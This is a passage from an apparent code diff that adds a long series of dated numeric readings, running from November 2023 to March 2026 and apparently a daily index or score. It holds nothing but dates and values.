"2023-11-06", + 59.29303191624193 + ], + [ + "2023-11-07", + 62.02081186336165 + ], + [ + "2023-11-08", + 62.20835475595592 + ], + [ + "2023-11-09", + 58.488868923564226 + ], + [ + "2023-11-10", + 65.0186557458826 + ], + [ + "2023-11-13", + 63.49311858748467 + ], + [ + "2023-11-14", + 68.90045505219518 + ], + [ + "2023-11-15", + 69.07663047044902 + ], + [ + "2023-11-16", + 69.28979257402557 + ], + [ + "2023-11-17", + 69.3518288727721 + ], + [ + "2023-11-20", + 72.47931465466112 + ], + [ + "2023-11-21", + 68.82629503540399 + ], + [ + "2023-11-22", + 69.96808952643568 + ], + [ + "2023-11-24", + 69.02619525138385 + ], + [ + "2023-11-27", + 68.41318555961163 + ], + [ + "2023-11-28", + 69.29427157879195 + ], + [ + "2023-11-29", + 68.52727032832821 + ], + [ + "2023-11-30", + 66.48379468416766 + ], + [ + "2023-12-01", + 67.66017090505466 + ], + [ + "2023-12-04", + 60.235084377544766 + ], + [ + "2023-12-05", + 61.45565764291583 + ], + [ + "2023-12-06", + 57.09691206458106 + ], + [ + "2023-12-07", + 63.747404596364916 + ], + [ + "2023-12-08", + 65.60442696946097 + ], + [ + "2023-12-11", + 68.90671236348734 + ], + [ + "2023-12-12", + 71.66185617705504 + ], + [ + "2023-12-13", + 75.43480084862398 + ], + [ + "2023-12-14", + 74.69550553243603 + ], + [ + "2023-12-15", + 76.10088036249985 + ], + [ + "2023-12-18", + 77.83656226063725 + ], + [ + "2023-12-19", + 79.16664157684808 + ], + [ + "2023-12-20", + 66.58710071302474 + ], + [ + "2023-12-21", + 70.4833583893777 + ], + [ + "2023-12-22", + 70.95766888671659 + ], + [ + "2023-12-26", + 72.8812212029536 + ], + [ + "2023-12-27", + 73.51329306864545 + ], + [ + "2023-12-28", + 73.07453522735543 + ], + [ + "2023-12-29", + 69.11989589235235 + ], + [ + "2024-01-02", + 56.33737176281377 + ], + [ + "2024-01-03", + 50.19238212768665 + ], + [ + "2024-01-04", + 47.50706407620317 + ], + [ + "2024-01-05", + 48.19138100853434 + ], + [ + "2024-01-08", + 58.38546497635295 + ], + [ + "2024-01-09", + 59.22832788291705 + ], + [ + "2024-01-10", + 62.07214790716493 + ], + [ + "2024-01-11", + 62.93273255009611 + ], + [ + "2024-01-12", + 63.155186235079974 + ], + [ + "2024-01-16", + 63.07740651773787 + ], + [ + "2024-01-17", + 58.59700952044971 + ], + [ + "2024-01-18", + 65.24856578747817 + ], + [ + "2024-01-19", + 72.0905650519369 + ], + [ + "2024-01-22", + 72.48235840292773 + ], + [ + "2024-01-23", + 73.74538401113979 + ], + [ + "2024-01-24", + 75.37951981757422 + ], + [ + "2024-01-25", + 75.73940613084332 + ], + [ + "2024-01-26", + 70.33197293627708 + ], + [ + "2024-01-29", + 73.77694516256147 + ], + [ + "2024-01-30", + 68.17829910048775 + ], + [ + "2024-01-31", + 55.03291596318424 + ], + [ + "2024-02-01", + 59.93637017161218 + ], + [ + "2024-02-02", + 65.77299965955511 + ], + [ + "2024-02-05", + 64.97245956914995 + ], + [ + "2024-02-06", + 63.69017684578462 + ], + [ + "2024-02-07", + 67.25100556536115 + ], + [ + "2024-02-08", + 67.86807136288316 + ], + [ + "2024-02-09", + 71.0011328371715 + ], + [ + "2024-02-12", + 68.12941975632826 + ], + [ + "2024-02-13", + 58.08353788687847 + ], + [ + "2024-02-14", + 62.21073195267623 + ], + [ + "2024-02-15", + 63.28609725825088 + ], + [ + "2024-02-16", + 57.869471478484016 + ], + [ + "2024-02-20", + 53.780413876981555 + ], + [ + "2024-02-21", + 51.710013479926005 + ], + [ + "2024-02-22", + 62.91331061628236 + ], + [ + "2024-02-23", + 61.32688261331854 + ], + [ + "2024-02-26", + 61.03144049650358 + ], + [ + "2024-02-27", + 61.9331357246636 + ], + [ + "2024-02-28", + 58.68785666039958 + ], + [ + "2024-02-29", + 62.11073085225069 + ], + [ + "2024-03-01", + 67.28373231076804 + ], + [ + "2024-03-04", + 64.9853697611839 + ], + [ + "2024-03-05", + 54.8677316576145 + ], + [ + "2024-03-06", + 57.32748475104745 + ], + [ + "2024-03-07", + 62.65520187639255 + ], + [ + "2024-03-08", + 55.4562867988755 + ], + [ + "2024-03-11", + 53.76973231518591 + ], + [ + "2024-03-12", + 58.94237725524445 + ], + [ + "2024-03-13", + 55.317211001342784 + ], + [ + "2024-03-14", + 54.14984033992267 + ], + [ + "2024-03-15", + 48.92092781224905 + ], + [ + "2024-03-18", + 52.811435857912755 + ], + [ + "2024-03-19", + 53.810621817261044 + ], + [ + "2024-03-20", + 58.34234415658998 + ], + [ + "2024-03-21", + 60.04716266020657 + ], + [ + "2024-03-22", + 60.47030514806476 + ], + [ + "2024-03-25", + 58.356235408486945 + ], + [ + "2024-03-26", + 56.46649039639415 + ], + [ + "2024-03-27", + 58.00222243578616 + ], + [ + "2024-03-28", + 56.829882287312834 + ], + [ + "2024-04-01", + 57.88097888454973 + ], + [ + "2024-04-02", + 52.280983876747314 + ], + [ + "2024-04-03", + 53.52930985177631 + ], + [ + "2024-04-04", + 44.89350514860254 + ], + [ + "2024-04-05", + 51.31264559878181 + ], + [ + "2024-04-08", + 51.46702068299802 + ], + [ + "2024-04-09", + 53.45852963814625 + ], + [ + "2024-04-10", + 48.39416560291953 + ], + [ + "2024-04-11", + 56.45120598570859 + ], + [ + "2024-04-12", + 48.22674593115369 + ], + [ + "2024-04-15", + 41.598814665467934 + ], + [ + "2024-04-16", + 41.64671108768089 + ], + [ + "2024-04-17", + 37.311612951938855 + ], + [ + "2024-04-18", + 35.47447486340356 + ], + [ + "2024-04-19", + 29.781723166709185 + ], + [ + "2024-04-22", + 35.11923398249597 + ], + [ + "2024-04-23", + 42.209742185576054 + ], + [ + "2024-04-24", + 43.73543832986322 + ], + [ + "2024-04-25", + 42.02616617015561 + ], + [ + "2024-04-26", + 48.86880825040764 + ], + [ + "2024-04-29", + 50.54822467064197 + ], + [ + "2024-04-30", + 43.39150341514885 + ], + [ + "2024-05-01", + 41.037420698538824 + ], + [ + "2024-05-02", + 46.51370546324031 + ], + [ + "2024-05-03", + 53.87184981103807 + ], + [ + "2024-05-06", + 57.38202856246087 + ], + [ + "2024-05-07", + 57.43326920679567 + ], + [ + "2024-05-08", + 57.158609130314076 + ], + [ + "2024-05-09", + 57.958000184864815 + ], + [ + "2024-05-10", + 58.85369582477899 + ], + [ + "2024-05-13", + 59.759242673126394 + ], + [ + "2024-05-14", + 62.258510903458436 + ], + [ + "2024-05-15", + 67.56430916510303 + ], + [ + "2024-05-16", + 66.24060024172682 + ], + [ + "2024-05-17", + 65.90800482234002 + ], + [ + "2024-05-20", + 68.35742302382624 + ], + [ + "2024-05-21", + 69.0343170324655 + ], + [ + "2024-05-22", + 68.873916699484 + ], + [ + "2024-05-23", + 65.1587974147221 + ], + [ + "2024-05-24", + 68.93513997720066 + ], + [ + "2024-05-28", + 70.33163983680222 + ], + [ + "2024-05-29", + 64.48488032252993 + ], + [ + "2024-05-30", + 56.8088563485818 + ], + [ + "2024-05-31", + 55.58489010271461 + ], + [ + "2024-06-03", + 58.3679616795728 + ], + [ + "2024-06-04", + 59.75934149183945 + ], + [ + "2024-06-05", + 68.21115743699896 + ], + [ + "2024-06-06", + 67.94277120589962 + ], + [ + "2024-06-07", + 67.21278008849106 + ], + [ + "2024-06-10", + 68.85620489801134 + ], + [ + "2024-06-11", + 71.48221710327692 + ], + [ + "2024-06-12", + 75.7191011560705 + ], + [ + "2024-06-13", + 77.24545814999013 + ], + [ + "2024-06-14", + 78.63551758319298 + ], + [ + "2024-06-17", + 81.52415169520043 + ], + [ + "2024-06-18", + 81.59265905678411 + ], + [ + "2024-06-20", + 74.20627690956897 + ], + [ + "2024-06-21", + 71.79212143564818 + ], + [ + "2024-06-24", + 62.51107106190212 + ], + [ + "2024-06-25", + 67.06445896442722 + ], + [ + "2024-06-26", + 67.83301554530587 + ], + [ + "2024-06-27", + 68.81456175055634 + ], + [ + "2024-06-28", + 64.53861425622358 + ], + [ + "2024-07-01", + 67.0192853435289 + ], + [ + "2024-07-02", + 70.95884736126618 + ], + [ + "2024-07-03", + 73.67592838286991 + ], + [ + "2024-07-05", + 76.6436550811854 + ], + [ + "2024-07-08", + 77.27937192933372 + ], + [ + "2024-07-09", + 77.51951997507743 + ], + [ + "2024-07-10", + 80.23483199378256 + ], + [ + "2024-07-11", + 62.8581031872991 + ], + [ + "2024-07-12", + 64.99712459737891 + ], + [ + "2024-07-15", + 65.96843753071717 + ], + [ + "2024-07-16", + 66.11310932678742 + ], + [ + "2024-07-17", + 48.933792416664204 + ], + [ + "2024-07-18", + 46.880830372713994 + ], + [ + "2024-07-19", + 43.23933390028174 + ], + [ + "2024-07-22", + 50.18173265624357 + ], + [ + "2024-07-23", + 48.6432364121927 + ], + [ + "2024-07-24", + 36.44185226950088 + ], + [ + "2024-07-25", + 33.74033735716081 + ], + [ + "2024-07-26", + 38.27296576686431 + ], + [ + "2024-07-29", + 39.159758112412526 + ], + [ + "2024-07-30", + 35.40735334426478 + ], + [ + "2024-07-31", + 47.02692294420571 + ], + [ + "2024-08-01", + 40.42712489421891 + ], + [ + "2024-08-02", + 35.32252475075313 + ], + [ + "2024-08-05", + 30.27390918171018 + ], + [ + "2024-08-06", + 33.45834123847898 + ], + [ + "2024-08-07", + 31.675699039343357 + ], + [ + "2024-08-08", + 41.11603364319639 + ], + [ + "2024-08-09", + 42.61828371249015 + ], + [ + "2024-08-12", + 43.264421231036735 + ], + [ + "2024-08-13", + 50.23282565669911 + ], + [ + "2024-08-14", + 50.32087591347701 + ], + [ + "2024-08-15", + 56.74108300316934 + ], + [ + "2024-08-16", + 57.05296740934669 + ], + [ + "2024-08-19", + 60.21316743259839 + ], + [ + "2024-08-20", + 59.45063909517159 + ], + [ + "2024-08-21", + 60.64111067437756 + ], + [ + "2024-08-22", + 54.73137807212243 + ], + [ + "2024-08-23", + 57.71870324595425 + ], + [ + "2024-08-26", + 54.23130273374791 + ], + [ + "2024-08-27", + 55.1211566546783 + ], + [ + "2024-08-28", + 51.04897970681378 + ], + [ + "2024-08-29", + 50.53620332371619 + ], + [ + "2024-08-30", + 54.53502129736665 + ], + [ + "2024-09-03", + 44.53997824859216 + ], + [ + "2024-09-04", + 43.82214965021133 + ], + [ + "2024-09-05", + 44.16940390687247 + ], + [ + "2024-09-06", + 37.08075582171197 + ], + [ + "2024-09-09", + 41.78177015064747 + ], + [ + "2024-09-10", + 45.00289766919795 + ], + [ + "2024-09-11", + 51.8118964683154 + ], + [ + "2024-09-12", + 54.60715352025589 + ], + [ + "2024-09-13", + 55.877397353192144 + ], + [ + "2024-09-16", + 54.2576880648526 + ], + [ + "2024-09-17", + 54.427052546338736 + ], + [ + "2024-09-18", + 52.70382129849365 + ], + [ + "2024-09-19", + 60.52919956996867 + ], + [ + "2024-09-20", + 59.708085277288504 + ], + [ + "2024-09-23", + 60.51003755901595 + ], + [ + "2024-09-24", + 61.99626668078433 + ], + [ + "2024-09-25", + 62.29144102167434 + ], + [ + "2024-09-26", + 64.68724359091493 + ], + [ + "2024-09-27", + 61.548977605411274 + ], + [ + "2024-09-30", + 62.49977533380813 + ], + [ + "2024-10-01", + 54.95998977602352 + ], + [ + "2024-10-02", + 55.537674379256295 + ], + [ + "2024-10-03", + 55.134507034306665 + ], + [ + "2024-10-04", + 60.099164131383255 + ], + [ + "2024-10-07", + 54.21364183847244 + ], + [ + "2024-10-08", + 60.02820655320904 + ], + [ + "2024-10-09", + 62.75215853319854 + ], + [ + "2024-10-10", + 62.08941444472769 + ], + [ + "2024-10-11", + 62.673151448014686 + ], + [ + "2024-10-14", + 65.728903627065 + ], + [ + "2024-10-15", + 57.57552854039728 + ], + [ + "2024-10-16", + 57.626612976091366 + ], + [ + "2024-10-17", + 57.935638283561914 + ], + [ + "2024-10-18", + 60.84783512711624 + ], + [ + "2024-10-21", + 61.69053166616188 + ], + [ + "2024-10-22", + 62.18868658881581 + ], + [ + "2024-10-23", + 51.949444445335146 + ], + [ + "2024-10-24", + 56.01339399659365 + ], + [ + "2024-10-25", + 58.85256163264147 + ], + [ + "2024-10-28", + 58.928730985867595 + ], + [ + "2024-10-29", + 63.28190482999287 + ], + [ + "2024-10-30", + 58.02257548130236 + ], + [ + "2024-10-31", + 44.7467077848002 + ], + [ + "2024-11-01", + 48.380750078307294 + ], + [ + "2024-11-04", + 47.058678324367335 + ], + [ + "2024-11-05", + 53.086692683600056 + ], + [ + "2024-11-06", + 62.89758154870317 + ], + [ + "2024-11-07", + 67.28420812423639 + ], + [ + "2024-11-08", + 67.59525125108496 + ], + [ + "2024-11-11", + 67.25103783584606 + ], + [ + "2024-11-12", + 66.12671885288276 + ], + [ + "2024-11-13", + 65.29254347137179 + ], + [ + "2024-11-14", + 60.834541494610185 + ], + [ + "2024-11-15", + 48.65471336772212 + ], + [ + "2024-11-18", + 51.62379130981246 + ], + [ + "2024-11-19", + 54.45204377159859 + ], + [ + "2024-11-20", + 54.16454261891763 + ], + [ + "2024-11-21", + 55.73536628092468 + ], + [ + "2024-11-22", + 56.45460502972148 + ], + [ + "2024-11-25", + 57.194338580129134 + ], + [ + "2024-11-26", + 59.70109709657369 + ], + [ + "2024-11-27", + 54.62253853251777 + ], + [ + "2024-11-29", + 58.80145536954117 + ], + [ + "2024-12-02", + 63.345527365578526 + ], + [ + "2024-12-03", + 64.54450371048884 + ], + [ + "2024-12-04", + 68.96575789655657 + ], + [ + "2024-12-05", + 66.92627045265593 + ], + [ + "2024-12-06", + 70.00292722210051 + ], + [ + "2024-12-09", + 64.34366445152932 + ], + [ + "2024-12-10", + 62.0003015787134 + ], + [ + "2024-12-11", + 68.47456997448616 + ], + [ + "2024-12-12", + 64.15514545563889 + ], + [ + "2024-12-13", + 66.81192512719973 + ], + [ + "2024-12-16", + 71.17390605059997 + ], + [ + "2024-12-17", + 68.18019188086113 + ], + [ + "2024-12-18", + 49.78671359673846 + ], + [ + "2024-12-19", + 48.123169292956156 + ], + [ + "2024-12-20", + 51.52814202228196 + ], + [ + "2024-12-23", + 55.100041194924536 + ], + [ + "2024-12-24", + 59.60508707231995 + ], + [ + "2024-12-26", + 59.279743887574355 + ], + [ + "2024-12-27", + 53.169847586512056 + ], + [ + "2024-12-30", + 47.91891800564437 + ], + [ + "2024-12-31", + 44.90891394915822 + ], + [ + "2025-01-02", + 44.22587164922776 + ], + [ + "2025-01-03", + 50.936371818001476 + ], + [ + "2025-01-06", + 55.08977208330589 + ], + [ + "2025-01-07", + 48.1901639677677 + ], + [ + "2025-01-08", + 48.257279188423254 + ], + [ + "2025-01-10", + 42.886772312642144 + ], + [ + "2025-01-13", + 41.874333067459524 + ], + [ + "2025-01-14", + 41.563161676111136 + ], + [ + "2025-01-15", + 51.04676280388894 + ], + [ + "2025-01-16", + 48.41092745961914 + ], + [ + "2025-01-17", + 54.46790241254073 + ], + [ + "2025-01-21", + 56.41519057838469 + ], + [ + "2025-01-22", + 60.41318080273645 + ], + [ + "2025-01-23", + 61.06095841245751 + ], + [ + "2025-01-24", + 58.32320231357707 + ], + [ + "2025-01-27", + 46.757218249083486 + ], + [ + "2025-01-28", + 51.827711797923094 + ], + [ + "2025-01-29", + 51.15125242675296 + ], + [ + "2025-01-30", + 52.65862499147549 + ], + [ + "2025-01-31", + 52.066284697369085 + ], + [ + "2025-02-03", + 48.81385304818378 + ], + [ + "2025-02-04", + 53.56665887521179 + ], + [ + "2025-02-05", + 55.24148510647922 + ], + [ + "2025-02-06", + 57.1640474666054 + ], + [ + "2025-02-07", + 51.389520018108996 + ], + [ + "2025-02-10", + 55.93234842155773 + ], + [ + "2025-02-11", + 54.83389440311268 + ], + [ + "2025-02-12", + 55.067752183145984 + ], + [ + "2025-02-13", + 60.47046368292 + ], + [ + "2025-02-14", + 61.929939714973344 + ], + [ + "2025-02-18", + 62.733359498220196 + ], + [ + "2025-02-19", + 62.83728671076759 + ], + [ + "2025-02-20", + 60.084399673590625 + ], + [ + "2025-02-21", + 48.8609359491776 + ], + [ + "2025-02-24", + 43.937963660135 + ], + [ + "2025-02-25", + 39.42599794558758 + ], + [ + "2025-02-26", + 40.668158251931494 + ], + [ + "2025-02-27", + 32.41779563573995 + ], + [ + "2025-02-28", + 39.70086317452027 + ], + [ + "2025-03-03", + 34.12605339930474 + ], + [ + "2025-03-04", + 33.443855415659755 + ], + [ + "2025-03-05", + 39.09107804828991 + ], + [ + "2025-03-06", + 32.70289900300649 + ], + [ + "2025-03-07", + 35.64698941252861 + ], + [ + "2025-03-10", + 28.514543017957138 + ], + [ + "2025-03-11", + 28.154874540124652 + ], + [ + "2025-03-12", + 32.47341056753373 + ], + [ + "2025-03-13", + 29.403663529019042 + ], + [ + "2025-03-14", + 37.76289605456151 + ], + [ + "2025-03-17", + 39.869440199572004 + ], + [ + "2025-03-18", + 36.36195304003508 + ], + [ + "2025-03-19", + 40.697002197015884 + ], + [ + "2025-03-20", + 39.94480272469873 + ], + [ + "2025-03-21", + 41.081561016211545 + ], + [ + "2025-03-24", + 48.14146395923028 + ], + [ + "2025-03-25", + 49.86093216059807 + ], + [ + "2025-03-26", + 44.6865159081875 + ], + [ + "2025-03-27", + 43.21836369649193 + ], + [ + "2025-03-28", + 37.175396239743286 + ], + [ + "2025-03-31", + 37.166585184888795 + ], + [ + "2025-04-01", + 40.063340619468484 + ], + [ + "2025-04-02", + 42.66156324105379 + ], + [ + "2025-04-03", + 31.720438265441828 + ], + [ + "2025-04-04", + 24.33893440291375 + ], + [ + "2025-04-07", + 25.023645532120696 + ], + [ + "2025-04-08", + 23.32329133153503 + ], + [ + "2025-04-09", + 48.154888007397226 + ], + [ + "2025-04-10", + 42.299956354815194 + ], + [ + "2025-04-11", + 45.27192463434173 + ], + [ + "2025-04-14", + 46.38623423307305 + ], + [ + "2025-04-15", + 46.580188222227605 + ], + [ + "2025-04-16", + 42.13512117422315 + ], + [ + "2025-04-17", + 42.11004990905149 + ], + [ + "2025-04-21", + 38.70329000224228 + ], + [ + "2025-04-22", + 43.77155644800944 + ], + [ + "2025-04-23", + 47.88554250431302 + ], + [ + "2025-04-24", + 52.62227258710621 + ], + [ + "2025-04-25", + 54.43888846577506 + ], + [ + "2025-04-28", + 54.37426539966888 + ], + [ + "2025-04-29", + 55.55640258530198 + ], + [ + "2025-04-30", + 55.52661685745107 + ], + [ + "2025-05-01", + 58.035138827057736 + ], + [ + "2025-05-02", + 60.778270262895596 + ], + [ + "2025-05-05", + 59.09109083444396 + ], + [ + "2025-05-06", + 56.46035940984963 + ], + [ + "2025-05-07", + 57.316058985383926 + ], + [ + "2025-05-08", + 59.5750968243549 + ], + [ + "2025-05-09", + 59.3581067922629 + ], + [ + "2025-05-12", + 67.32029069523355 + ], + [ + "2025-05-13", + 69.80093457498899 + ], + [ + "2025-05-14", + 70.75530472216816 + ], + [ + "2025-05-15", + 70.93774740639999 + ], + [ + "2025-05-16", + 71.69191500093866 + ], + [ + "2025-05-19", + 71.86584402579766 + ], + [ + "2025-05-20", + 70.2481673417969 + ], + [ + "2025-05-21", + 63.8198260647593 + ], + [ + "2025-05-22", + 64.28716736649812 + ], + [ + "2025-05-23", + 60.13938178599054 + ], + [ + "2025-05-27", + 66.07240995476144 + ], + [ + "2025-05-28", + 64.09140669211936 + ], + [ + "2025-05-29", + 64.59617821590928 + ], + [ + "2025-05-30", + 63.81953473290632 + ], + [ + "2025-06-02", + 66.01945243958437 + ], + [ + "2025-06-03", + 68.10301430309482 + ], + [ + "2025-06-04", + 68.84246280850812 + ], + [ + "2025-06-05", + 64.4836141854839 + ], + [ + "2025-06-06", + 67.35292921536296 + ], + [ + "2025-06-09", + 67.77919292078528 + ], + [ + "2025-06-10", + 69.69642993158905 + ], + [ + "2025-06-11", + 67.47882819286478 + ], + [ + "2025-06-12", + 68.234738280198 + ], + [ + "2025-06-13", + 60.16338403884248 + ], + [ + "2025-06-16", + 65.03616663022382 + ], + [ + "2025-06-17", + 59.46814393352815 + ], + [ + "2025-06-18", + 59.37354496581538 + ], + [ + "2025-06-20", + 57.029712775322636 + ], + [ + "2025-06-23", + 61.169819197921726 + ], + [ + "2025-06-24", + 66.40690577309245 + ], + [ + "2025-06-25", + 67.21515006675564 + ], + [ + "2025-06-26", + 70.0598159372311 + ], + [ + "2025-06-27", + 71.05922726441108 + ], + [ + "2025-06-30", + 72.90805899002235 + ], + [ + "2025-07-01", + 66.88105763251103 + ], + [ + "2025-07-02", + 69.13260107729752 + ], + [ + "2025-07-03", + 72.04420152915165 + ], + [ + "2025-07-07", + 66.79866384543462 + ], + [ + "2025-07-08", + 66.9901590736776 + ], + [ + "2025-07-09", + 69.38847067013461 + ], + [ + "2025-07-10", + 68.2951126675571 + ], + [ + "2025-07-11", + 66.5311468760481 + ], + [ + "2025-07-14", + 67.96408204207204 + ], + [ + "2025-07-15", + 68.33443689256126 + ], + [ + "2025-07-16", + 68.76908724064816 + ], + [ + "2025-07-17", + 72.03950051731327 + ], + [ + "2025-07-18", + 71.07980818964255 + ], + [ + "2025-07-21", + 73.15535878016804 + ], + [ + "2025-07-22", + 67.89019790030295 + ], + [ + "2025-07-23", + 69.93333074307763 + ], + [ + "2025-07-24", + 70.8689854503811 + ], + [ + "2025-07-25", + 71.93500457689284 + ], + [ + "2025-07-28", + 73.30423369139866 + ], + [ + "2025-07-29", + 71.4382434880689 + ], + [ + "2025-07-30", + 72.09879890149904 + ], + [ + "2025-07-31", + 65.62493905676178 + ], + [ + "2025-08-01", + 48.34061686259984 + ], + [ + "2025-08-04", + 59.015126086939034 + ], + [ + "2025-08-05", + 54.472497614045125 + ], + [ + "2025-08-06", + 60.49979583493349 + ], + [ + "2025-08-07", + 61.97614414604969 + ], + [ + "2025-08-08", + 65.78504791515746 + ], + [ + "2025-08-11", + 63.588888466973785 + ], + [ + "2025-08-12", + 68.4003622442131 + ], + [ + "2025-08-13", + 68.58050236075579 + ], + [ + "2025-08-14", + 67.93364190687129 + ], + [ + "2025-08-15", + 64.23535368893981 + ], + [ + "2025-08-18", + 63.89742183069462 + ], + [ + "2025-08-19", + 53.56738568909339 + ], + [ + "2025-08-20", + 49.823003341404714 + ], + [ + "2025-08-21", + 47.076030798940444 + ], + [ + "2025-08-22", + 55.78381837135376 + ], + [ + "2025-08-25", + 53.96815179414623 + ], + [ + "2025-08-26", + 56.103632694665215 + ], + [ + "2025-08-27", + 56.93059814920235 + ], + [ + "2025-08-28", + 60.22252269121915 + ], + [ + "2025-08-29", + 52.22382647385613 + ], + [ + "2025-09-02", + 47.37498506205308 + ], + [ + "2025-09-03", + 51.85647060309463 + ], + [ + "2025-09-04", + 56.484115567408814 + ], + [ + "2025-09-05", + 57.196798869670886 + ], + [ + "2025-09-08", + 59.60873074518341 + ], + [ + "2025-09-09", + 60.99035758664669 + ], + [ + "2025-09-10", + 61.15610542894127 + ], + [ + "2025-09-11", + 64.08032486268121 + ], + [ + "2025-09-12", + 66.17364133250962 + ], + [ + "2025-09-15", + 69.8548866651253 + ], + [ + "2025-09-16", + 69.04893793289584 + ], + [ + "2025-09-17", + 67.08169789564371 + ], + [ + "2025-09-18", + 71.0818700094328 + ], + [ + "2025-09-19", + 73.6899989470409 + ], + [ + "2025-09-22", + 75.7626894001163 + ], + [ + "2025-09-23", + 69.14206575938451 + ], + [ + "2025-09-24", + 65.88677893162674 + ], + [ + "2025-09-25", + 62.037409666267145 + ], + [ + "2025-09-26", + 64.17727040677522 + ], + [ + "2025-09-29", + 66.47905903310468 + ], + [ + "2025-09-30", + 67.80294363793247 + ], + [ + "2025-10-01", + 70.0405481891695 + ], + [ + "2025-10-02", + 71.85451138008827 + ], + [ + "2025-10-03", + 67.33980411415351 + ], + [ + "2025-10-06", + 70.84445532659605 + ], + [ + "2025-10-07", + 65.49771299886935 + ], + [ + "2025-10-08", + 70.66177507449021 + ], + [ + "2025-10-09", + 69.46607768522296 + ], + [ + "2025-10-10", + 45.640220599649545 + ], + [ + "2025-10-13", + 55.36825477851986 + ], + [ + "2025-10-14", + 52.14681650028183 + ], + [ + "2025-10-15", + 55.10697475362638 + ], + [ + "2025-10-16", + 53.23300974579039 + ], + [ + "2025-10-17", + 56.07516187030509 + ], + [ + "2025-10-20", + 61.00451478170778 + ], + [ + "2025-10-21", + 60.85000010530663 + ], + [ + "2025-10-22", + 55.29398700163002 + ], + [ + "2025-10-23", + 58.795340414940966 + ], + [ + "2025-10-24", + 62.812963687038796 + ], + [ + "2025-10-27", + 68.40513124995707 + ], + [ + "2025-10-28", + 70.5044338825302 + ], + [ + "2025-10-29", + 71.69936517506414 + ], + [ + "2025-10-30", + 62.41263247122477 + ], + [ + "2025-10-31", + 63.9739442664813 + ], + [ + "2025-11-03", + 65.51160275998808 + ], + [ + "2025-11-04", + 54.779032096089715 + ], + [ + "2025-11-05", + 57.15351358860319 + ], + [ + "2025-11-06", + 49.147112368831515 + ], + [ + "2025-11-07", + 47.944715459798026 + ], + [ + "2025-11-10", + 56.04016526444903 + ], + [ + "2025-11-11", + 54.90856548471626 + ], + [ + "2025-11-12", + 54.55834174608961 + ], + [ + "2025-11-13", + 46.32440348905366 + ], + [ + "2025-11-14", + 46.63901013002466 + ], + [ + "2025-11-17", + 43.532575439685 + ], + [ + "2025-11-18", + 39.52523548044856 + ], + [ + "2025-11-19", + 42.29598905098326 + ], + [ + "2025-11-20", + 35.34064285672922 + ], + [ + "2025-11-21", + 38.70419359861804 + ], + [ + "2025-11-24", + 48.582814747836075 + ], + [ + "2025-11-25", + 50.69794435980614 + ], + [ + "2025-11-26", + 53.6590395878372 + ], + [ + "2025-11-28", + 56.27680502330042 + ], + [ + "2025-12-01", + 54.88227579712147 + ], + [ + "2025-12-02", + 57.51493004028151 + ], + [ + "2025-12-03", + 58.338817475956944 + ], + [ + "2025-12-04", + 57.87758479295596 + ], + [ + "2025-12-05", + 59.3916420919982 + ], + [ + "2025-12-08", + 58.325035979843804 + ], + [ + "2025-12-09", + 58.83588063078125 + ], + [ + "2025-12-10", + 60.56660697788882 + ], + [ + "2025-12-11", + 58.467397826907025 + ], + [ + "2025-12-12", + 47.92745529565921 + ], + [ + "2025-12-15", + 45.64537235104613 + ], + [ + "2025-12-16", + 46.718696827152925 + ], + [ + "2025-12-17", + 38.95490637555612 + ], + [ + "2025-12-18", + 46.324631351955176 + ], + [ + "2025-12-19", + 52.0178779131538 + ], + [ + "2025-12-22", + 53.97631190790889 + ], + [ + "2025-12-23", + 55.88012135174942 + ], + [ + "2025-12-24", + 57.08010567332411 + ], + [ + "2025-12-26", + 57.04335896202142 + ], + [ + "2025-12-29", + 54.2079453772734 + ], + [ + "2025-12-30", + 52.858717616458826 + ], + [ + "2025-12-31", + 48.25952701516102 + ], + [ + "2026-01-02", + 47.230927888146915 + ], + [ + "2026-01-05", + 51.76222803214646 + ], + [ + "2026-01-06", + 56.271122811755326 + ], + [ + "2026-01-07", + 56.75221310727431 + ], + [ + "2026-01-08", + 53.03476275870342 + ], + [ + "2026-01-09", + 58.17135225578615 + ], + [ + "2026-01-12", + 58.581830007564704 + ], + [ + "2026-01-13", + 57.49512772120071 + ], + [ + "2026-01-14", + 50.27091354611099 + ], + [ + "2026-01-15", + 52.4171680471203 + ], + [ + "2026-01-16", + 51.85516304112819 + ], + [ + "2026-01-20", + 40.10133484160906 + ], + [ + "2026-01-21", + 48.00503530156068 + ], + [ + "2026-01-22", + 51.74243783270874 + ], + [ + "2026-01-23", + 53.323208746956006 + ], + [ + "2026-01-26", + 55.516941398698286 + ], + [ + "2026-01-27", + 59.734208759740895 + ], + [ + "2026-01-28", + 61.194610244302446 + ], + [ + "2026-01-29", + 57.14688852077282 + ], + [ + "2026-01-30", + 50.03708383935626 + ], + [ + "2026-02-02", + 53.55208059574001 + ], + [ + "2026-02-03", + 45.744040208483256 + ], + [ + "2026-02-04", + 38.905013258894144 + ], + [ + "2026-02-05", + 34.41824702901903 + ], + [ + "2026-02-06", + 44.4102079806966 + ], + [ + "2026-02-09", + 47.59225972274992 + ], + [ + "2026-02-10", + 45.8667165392504 + ], + [ + "2026-02-11", + 47.056273347541286 + ], + [ + "2026-02-12", + 39.88024336729888 + ], + [ + "2026-02-13", + 40.8769105419868 + ], + [ + "2026-02-17", + 40.52642475605996 + ], + [ + "2026-02-18", + 44.25393020306629 + ], + [ + "2026-02-19", + 42.76257386728545 + ], + [ + "2026-02-20", + 47.17530760181783 + ], + [ + "2026-02-23", + 42.307625273253244 + ], + [ + "2026-02-24", + 47.40917079070809 + ], + [ + "2026-02-25", + 53.454077537091266 + ], + [ + "2026-02-26", + 48.39510923682298 + ], + [ + "2026-02-27", + 47.13593134660463 + ], + [ + "2026-03-02", + 47.73672665691216 + ], + [ + "2026-03-03", + 43.413082210107945 + ], + [ + "2026-03-04", + 50.24868516214233 + ], + [ + "2026-03-05", + 48.97034164339593 + ], + [ + "2026-03-06", + 43.09312555274008 + ], + [ + "2026-03-09", + 48.871742995435106 + ], + [ + "2026-03-10", + 48.87873791454798 + ], + [ + "2026-03-11", + 48.821324714953775 + ], + [ + "2026-03-12", + 41.909312066309624 + ], + [ + "2026-03-13", + 39.84724946493397 + ], + [ + "2026-03-16", + 45.300153686334816 + ], + [ + "2026-03-17", + 47.552714860080286 + ], + [ + "2026-03-18", + 42.183177008343606 + ], + [ + "2026-03-19", + 41.06679178481037 + ], + [ + "2026-03-20", + 35.21569399496299 + ], + [ + "2026-03-23", + 40.757175754313174 + ], + [ + "2026-03-24", + 38.61431524927745 + ], + [ + "2026-03-25", + 41.76403474392534 + ], + [ + "2026-03-26", + 34.74864709553303 + ], + [ + "2026-03-27", + 30.360436679871583 + ], + [ + "2026-03-30", + 28.855145164236404 + ], + [ + 